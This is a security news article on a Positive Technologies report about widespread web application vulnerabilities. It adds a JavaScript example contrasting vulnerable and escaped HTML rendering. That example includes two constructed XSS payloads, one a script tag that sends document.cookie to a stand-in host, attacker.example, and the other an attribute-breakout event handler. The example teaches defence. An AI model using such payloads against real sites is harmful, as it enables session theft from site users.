A recent study shined a light on an attack vector that is often overlooked: the insecurity of web applications.

According to the report, issued by Positive Technologies, 44 percent of web applications are vulnerable to data leakage and related security problems. In other words, threat actors can get at the personal customer data those applications handle, across verticals such as banking, e-commerce and communications.

In addition, 48 percent of the applications were found to be vulnerable to unauthorized access, and 17 percent contained vulnerabilities that could result in a full takeover by a threat actor. But perhaps the most eye-opening finding is that 100 percent of the web applications tested had some sort of vulnerability.

Security as an Afterthought

The web app as an attack vector isn’t a new problem, although we may not have realized how severe the vulnerabilities were. And worse, we’ve allowed the problem to linger: Many developers and IT decision-makers don’t take web app security seriously. Mozilla gave 93 percent of websites it observed a failing grade for security against cross-site scripting (XSS), for example. Application security tends to be treated as an afterthought, pushed behind other, more pressing security issues.

The biggest problem, no matter the programming language used, is XSS, according to the report. The authors also pointed to data leakage, fingerprinting and brute-force attacks as common issues across the board.
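The following is an added example for this article, not code from the Positive Technologies report or from any of the authors quoted. It shows the reflected XSS pattern the report ranks first (untrusted input concatenated into markup) beside the context-aware output encoding that prevents it. The search page, the attacker payloads and the `attacker.example` host are all constructed for the demonstration.

```javascript
// Added example (not from the article or the report): reflected XSS in a naive
// server-side template, and the HTML output encoding that fixes it.

// Encode the characters that can change meaning in HTML text or inside a
// double-quoted attribute value. Most template engines do this by default
// ("autoescaping"); hand-built string concatenation does not.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// VULNERABLE: a search page that reflects the query parameter into the body
// text and into an input's value attribute without encoding.
function renderSearchUnsafe(query) {
  return `<p>Results for: ${query}</p>\n` +
         `<input type="text" name="q" value="${query}">`;
}

// HARDENED: the identical page with the untrusted value encoded for both
// HTML contexts (text node and double-quoted attribute).
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<p>Results for: ${q}</p>\n` +
         `<input type="text" name="q" value="${q}">`;
}

// Two constructed attacker payloads, one per injection context.
// The first injects a script tag into the body; the second breaks out of the
// value="" attribute and adds an event handler.
const PAYLOAD_BODY = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)';

// Crude oracles for the demo: does a live <script> tag, or an on*="..."
// event-handler attribute, survive into the rendered markup?
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}
function hasEventHandler(html) {
  return /\son[a-z]+\s*=\s*"/i.test(html);
}

// Summarise which rendering path is exploitable with which payload.
function assess() {
  return {
    unsafeBodyInjected: hasScriptTag(renderSearchUnsafe(PAYLOAD_BODY)),
    unsafeAttrInjected: hasEventHandler(renderSearchUnsafe(PAYLOAD_ATTR)),
    safeBodyInjected: hasScriptTag(renderSearchSafe(PAYLOAD_BODY)),
    safeAttrInjected: hasEventHandler(renderSearchSafe(PAYLOAD_ATTR)),
  };
}

console.log(assess());
// { unsafeBodyInjected: true, unsafeAttrInjected: true,
//   safeBodyInjected: false, safeAttrInjected: false }
```

The encoder above is only correct for HTML text and double-quoted attribute values. Data that lands inside a JavaScript string, a URL, or a CSS value needs the encoder for that context, which is why frameworks expose separate helpers for each. A Content-Security-Policy header that disallows inline script is a worthwhile second layer, but it does not replace output encoding.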

App Security Lags Despite Increasing Awareness

“Web application security is still poor and, despite increasing awareness of the risks, is still not being prioritized enough in the development process,” said Leigh-Anne Galloway, Positive Technologies cybersecurity resilience lead, as quoted in Infosecurity Magazine. “Most of these issues could have been prevented entirely by implementing secure development practices, including code audits from the start and throughout.”

Why is web app security falling behind? In a blog post for Secure Code Warrior, Pieter Danhieux blamed human behavior, stating that not only do humans behave in ways that introduce vulnerabilities and security threats, but developers aren’t always brought into the security loop.

“How are developers supposed to write secure code if nobody ever teaches them about why it’s important, the consequences of insecure code, and most importantly, how to prevent writing these vulnerabilities in their respective programming frameworks in the first place?” he wrote.

How Cybercriminals Exploit Web Applications to Spread Malware

The Positive Technologies report cited two primary motivations for cybercriminals to take advantage of web application vulnerabilities. The first is to use the apps to infect enterprise networks and spread malware through them.

“This method was used to spread the Bad Rabbit ransomware: attackers compromised web applications belonging to media outlets and masked malware as an Adobe Flash Player update installer,” the report explained.

In another case, an attacker exploited a vulnerability to disseminate phishing emails targeting bank employees.

Some threats don't even involve a direct attack on the web app's own functionality; a compromised application can simply serve as a delivery channel for malware. The moment your website or web application is compromised, no matter the method, your organization's reputation takes a hit, which can lead to financial loss.

Data Theft in a Regulated World

The report also cited data theft as a key motivation for targeting web applications. Data leakage is a problem in any situation, be it customer data or corporate intellectual property. However, the stakes of stolen data have been raised in a post-General Data Protection Regulation (GDPR), pre-California Consumer Privacy Act (CCPA) world.

As more states decide to step up measures to protect customer data, any type of data loss can create extraordinary headaches for company leaders. Loss of data can cost an organization hundreds of thousands to millions of dollars in fines, according to data compiled by TermsFeed. At the same time, as more effort is put into data protection, stolen data will become more valuable on the dark web, encouraging threat actors to improve their targeting and attack styles.

How Can Companies Protect Web Applications?

Data privacy regulations require most companies to improve their web application security capabilities. IT leaders can start by building security measures directly into the app’s design as a way to put consumer security and privacy front and center.

“For application security, this means that security and privacy need to be thought about in the planning stages of the Software Development Life Cycle (SDLC),” cybersecurity expert Amit Ashbel wrote for ITProPortal. “Unfortunately, this is not currently the case with many organizations so this will be a large task for the industry.”

Built-in security and privacy measures are crucial. Web app developers should also implement a web application firewall, bolster password management, deploy mobile application management features and install security plugins where available.

As the Positive Technologies report pointed out, security issues in web applications clearly aren't getting the attention they require, because the firm's annual studies keep finding the same mistakes and concerns repeating themselves. Lax security may have been overlooked in the past, but as privacy regulations and their consequences gain traction, application vulnerabilities and data leakage can cost your organization more than just a light fine and a slap on the wrist.
